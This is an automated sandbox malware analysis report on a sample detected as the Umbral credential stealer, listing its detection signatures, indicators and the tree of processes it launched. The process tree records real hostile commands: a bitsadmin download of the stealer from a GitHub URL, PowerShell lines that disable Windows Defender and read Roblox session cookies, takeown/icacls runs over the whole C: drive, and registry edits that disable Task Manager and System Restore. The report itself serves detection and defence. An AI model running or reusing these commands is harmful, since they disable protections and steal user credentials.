Analysis
-
max time kernel
105s -
max time network
115s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2024 10:50
Static task
static1
Behavioral task
behavioral1
Sample
test.exe
Resource
win10v2004-20240802-en
General
-
Target
test.exe
-
Size
187KB
-
MD5
d6d75d536a2cff983197d333d0230a05
-
SHA1
cb3872741f661e1f483f7719619ec5c14db15e66
-
SHA256
cc13206ad514d61c7ea83f9380a571b93e23faafa829b04e877fcd38b4e83b75
-
SHA512
1219ebdf6ffe7aad099b4af6b9d837acb8183f671736af0bc627fceb18ce69ae9301167afc56277cf20ec7c9fd9f8d537f755bad8fa33c84c8579499a4489c26
-
SSDEEP
3072:wSV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPE6g0UasVmkoYcMKV:wHt5hBPi0BW69hd1MMdxPe9N9uA069Tx
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/4132-2-0x000001E377C10000-0x000001E377C50000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 5 IoCs
flow pid Process 33 952 WScript.exe 37 952 WScript.exe 66 2624 WScript.exe 67 2624 WScript.exe 69 2624 WScript.exe -
pid Process 768 powershell.exe 4860 powershell.exe 812 powershell.exe 4960 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 1932 bitsadmin.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 872 takeown.exe 3284 icacls.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation test.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 1256 melter.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 872 takeown.exe 3284 icacls.exe -
Enumerates connected drives 3 TTPs 47 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: WScript.exe File opened (read-only) \??\L: WScript.exe File opened (read-only) \??\I: WScript.exe File opened (read-only) \??\Q: WScript.exe File opened (read-only) \??\R: WScript.exe File opened (read-only) \??\V: WScript.exe File opened (read-only) \??\J: WScript.exe File opened (read-only) \??\T: WScript.exe File opened (read-only) \??\A: WScript.exe File opened (read-only) \??\G: WScript.exe File opened (read-only) \??\O: WScript.exe File opened (read-only) \??\D: WScript.exe File opened (read-only) \??\H: WScript.exe File opened (read-only) \??\R: WScript.exe File opened (read-only) \??\Y: WScript.exe File opened (read-only) \??\K: WScript.exe File opened (read-only) \??\M: WScript.exe File opened (read-only) \??\L: WScript.exe File opened (read-only) \??\T: WScript.exe File opened (read-only) \??\N: WScript.exe File opened (read-only) \??\Q: WScript.exe File opened (read-only) \??\S: WScript.exe File opened (read-only) \??\B: WScript.exe File opened (read-only) \??\J: WScript.exe File opened (read-only) \??\E: WScript.exe File opened (read-only) \??\K: WScript.exe File opened (read-only) \??\M: WScript.exe File opened (read-only) \??\E: WScript.exe File opened (read-only) \??\H: WScript.exe File opened (read-only) \??\Z: WScript.exe File opened (read-only) \??\S: WScript.exe File opened (read-only) \??\U: WScript.exe File opened (read-only) \??\B: WScript.exe File opened (read-only) \??\I: WScript.exe File opened (read-only) \??\O: WScript.exe File opened (read-only) \??\V: WScript.exe File opened (read-only) \??\X: WScript.exe File opened (read-only) \??\X: WScript.exe File opened (read-only) \??\W: WScript.exe File opened (read-only) \??\Z: WScript.exe File opened (read-only) \??\G: WScript.exe File opened (read-only) \??\P: WScript.exe File opened (read-only) \??\W: WScript.exe File opened (read-only) \??\N: WScript.exe File opened (read-only) \??\P: WScript.exe File opened (read-only) \??\U: WScript.exe File opened (read-only) \??\Y: WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 26 raw.githubusercontent.com 42 discord.com 43 discord.com 25 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 34 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa cmd.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language melter.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4632 cmd.exe 3952 PING.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 1152 timeout.exe 1068 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4092 wmic.exe -
Kills process with taskkill 11 IoCs
pid Process 1964 taskkill.exe 5000 taskkill.exe 2860 taskkill.exe 1792 taskkill.exe 4204 taskkill.exe 1900 taskkill.exe 3944 taskkill.exe 1664 taskkill.exe 2136 taskkill.exe 2364 taskkill.exe 1416 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3952 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 33 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 37 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4132 Umbral.exe 4960 powershell.exe 4960 powershell.exe 812 powershell.exe 812 powershell.exe 768 powershell.exe 768 powershell.exe 4976 powershell.exe 4976 powershell.exe 4860 powershell.exe 4860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 872 takeown.exe Token: SeTakeOwnershipPrivilege 872 takeown.exe Token: SeDebugPrivilege 4132 Umbral.exe Token: SeIncreaseQuotaPrivilege 3144 wmic.exe Token: SeSecurityPrivilege 3144 wmic.exe Token: SeTakeOwnershipPrivilege 3144 wmic.exe Token: SeLoadDriverPrivilege 3144 wmic.exe Token: SeSystemProfilePrivilege 3144 wmic.exe Token: SeSystemtimePrivilege 3144 wmic.exe Token: SeProfSingleProcessPrivilege 3144 wmic.exe Token: SeIncBasePriorityPrivilege 3144 wmic.exe Token: SeCreatePagefilePrivilege 3144 wmic.exe Token: SeBackupPrivilege 3144 wmic.exe Token: SeRestorePrivilege 3144 wmic.exe Token: SeShutdownPrivilege 3144 wmic.exe Token: SeDebugPrivilege 3144 wmic.exe Token: SeSystemEnvironmentPrivilege 3144 wmic.exe Token: SeRemoteShutdownPrivilege 3144 wmic.exe Token: SeUndockPrivilege 3144 wmic.exe Token: SeManageVolumePrivilege 3144 wmic.exe Token: 33 3144 wmic.exe Token: 34 3144 wmic.exe Token: 35 3144 wmic.exe Token: 36 3144 wmic.exe Token: SeIncreaseQuotaPrivilege 3144 wmic.exe Token: SeSecurityPrivilege 3144 wmic.exe Token: SeTakeOwnershipPrivilege 3144 wmic.exe Token: SeLoadDriverPrivilege 3144 wmic.exe Token: SeSystemProfilePrivilege 3144 wmic.exe Token: SeSystemtimePrivilege 3144 wmic.exe Token: SeProfSingleProcessPrivilege 3144 wmic.exe Token: SeIncBasePriorityPrivilege 3144 wmic.exe Token: SeCreatePagefilePrivilege 3144 wmic.exe Token: SeBackupPrivilege 3144 wmic.exe Token: SeRestorePrivilege 3144 wmic.exe Token: SeShutdownPrivilege 3144 wmic.exe Token: SeDebugPrivilege 3144 wmic.exe Token: SeSystemEnvironmentPrivilege 3144 wmic.exe Token: SeRemoteShutdownPrivilege 3144 wmic.exe Token: SeUndockPrivilege 3144 wmic.exe Token: SeManageVolumePrivilege 3144 wmic.exe Token: 33 3144 wmic.exe Token: 34 3144 wmic.exe Token: 35 3144 wmic.exe Token: 36 3144 wmic.exe Token: SeDebugPrivilege 4960 powershell.exe Token: SeDebugPrivilege 812 powershell.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 4976 powershell.exe Token: SeIncreaseQuotaPrivilege 1420 wmic.exe Token: SeSecurityPrivilege 1420 wmic.exe Token: SeTakeOwnershipPrivilege 1420 wmic.exe Token: SeLoadDriverPrivilege 1420 wmic.exe Token: SeSystemProfilePrivilege 1420 wmic.exe Token: SeSystemtimePrivilege 1420 wmic.exe Token: SeProfSingleProcessPrivilege 1420 wmic.exe Token: SeIncBasePriorityPrivilege 1420 wmic.exe Token: SeCreatePagefilePrivilege 1420 wmic.exe Token: SeBackupPrivilege 1420 wmic.exe Token: SeRestorePrivilege 1420 wmic.exe Token: SeShutdownPrivilege 1420 wmic.exe Token: SeDebugPrivilege 1420 wmic.exe Token: SeSystemEnvironmentPrivilege 1420 wmic.exe Token: SeRemoteShutdownPrivilege 1420 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4856 wrote to memory of 3088 4856 test.exe 84 PID 4856 wrote to memory of 3088 4856 test.exe 84 PID 3088 wrote to memory of 1932 3088 cmd.exe 86 PID 3088 wrote to memory of 1932 3088 cmd.exe 86 PID 3088 wrote to memory of 4132 3088 cmd.exe 91 PID 3088 wrote to memory of 4132 3088 cmd.exe 91 PID 3088 wrote to memory of 872 3088 cmd.exe 92 PID 3088 wrote to memory of 872 3088 cmd.exe 92 PID 3088 wrote to memory of 3284 3088 cmd.exe 93 PID 3088 wrote to memory of 3284 3088 cmd.exe 93 PID 3088 wrote to memory of 1640 3088 cmd.exe 94 PID 3088 wrote to memory of 1640 3088 cmd.exe 94 PID 3088 wrote to memory of 3116 3088 cmd.exe 95 PID 3088 wrote to memory of 3116 3088 cmd.exe 95 PID 4132 wrote to memory of 3144 4132 Umbral.exe 96 PID 4132 wrote to memory of 3144 4132 Umbral.exe 96 PID 3088 wrote to memory of 3536 3088 cmd.exe 98 PID 3088 wrote to memory of 3536 3088 cmd.exe 98 PID 3088 wrote to memory of 952 3088 cmd.exe 99 PID 3088 wrote to memory of 952 3088 cmd.exe 99 PID 3088 wrote to memory of 1152 3088 cmd.exe 100 PID 3088 wrote to memory of 1152 3088 cmd.exe 100 PID 4132 wrote to memory of 2100 4132 Umbral.exe 102 PID 4132 wrote to memory of 2100 4132 Umbral.exe 102 PID 4132 wrote to memory of 4960 4132 Umbral.exe 104 PID 4132 wrote to memory of 4960 4132 Umbral.exe 104 PID 4132 wrote to memory of 812 4132 Umbral.exe 106 PID 4132 wrote to memory of 812 4132 Umbral.exe 106 PID 4132 wrote to memory of 768 4132 Umbral.exe 108 PID 4132 wrote to memory of 768 4132 Umbral.exe 108 PID 4132 wrote to memory of 4976 4132 Umbral.exe 110 PID 4132 wrote to memory of 4976 4132 Umbral.exe 110 PID 4132 wrote to memory of 1420 4132 Umbral.exe 112 PID 4132 wrote to memory of 1420 4132 Umbral.exe 112 PID 4132 wrote to memory of 1164 4132 Umbral.exe 114 PID 4132 wrote to memory of 1164 4132 Umbral.exe 114 PID 4132 wrote to memory of 2180 4132 Umbral.exe 116 PID 4132 wrote to memory of 2180 4132 Umbral.exe 116 PID 4132 wrote to memory of 4860 4132 Umbral.exe 118 PID 4132 wrote to memory of 4860 4132 Umbral.exe 118 PID 4132 wrote to memory of 4092 4132 Umbral.exe 120 PID 4132 wrote to memory of 4092 4132 Umbral.exe 120 PID 4132 wrote to memory of 4632 4132 Umbral.exe 122 PID 4132 wrote to memory of 4632 4132 Umbral.exe 122 PID 4632 wrote to memory of 3952 4632 cmd.exe 124 PID 4632 wrote to memory of 3952 4632 cmd.exe 124 PID 3088 wrote to memory of 3732 3088 cmd.exe 128 PID 3088 wrote to memory of 3732 3088 cmd.exe 128 PID 3088 wrote to memory of 2896 3088 cmd.exe 129 PID 3088 wrote to memory of 2896 3088 cmd.exe 129 PID 3088 wrote to memory of 1068 3088 cmd.exe 130 PID 3088 wrote to memory of 1068 3088 cmd.exe 130 PID 3088 wrote to memory of 1664 3088 cmd.exe 132 PID 3088 wrote to memory of 1664 3088 cmd.exe 132 PID 3088 wrote to memory of 2136 3088 cmd.exe 133 PID 3088 wrote to memory of 2136 3088 cmd.exe 133 PID 3088 wrote to memory of 1964 3088 cmd.exe 134 PID 3088 wrote to memory of 1964 3088 cmd.exe 134 PID 3088 wrote to memory of 5000 3088 cmd.exe 135 PID 3088 wrote to memory of 5000 3088 cmd.exe 135 PID 3088 wrote to memory of 2364 3088 cmd.exe 136 PID 3088 wrote to memory of 2364 3088 cmd.exe 136 PID 3088 wrote to memory of 2860 3088 cmd.exe 137 PID 3088 wrote to memory of 2860 3088 cmd.exe 137 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2100 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\92BA.tmp\92BB.tmp\92BC.bat C:\Users\Admin\AppData\Local\Temp\test.exe"2⤵
- Checks computer location settings
- Drops startup file
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe3⤵
- Download via BitsAdmin
PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Views/modifies file attributes
PID:2100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:1164
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4860
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:4092
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3952
-
-
-
-
C:\Windows\system32\takeown.exetakeown /f C:\*.*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\system32\icacls.exeIcacls C:\*.* /C /G Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3284
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:1640
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵PID:3116
-
-
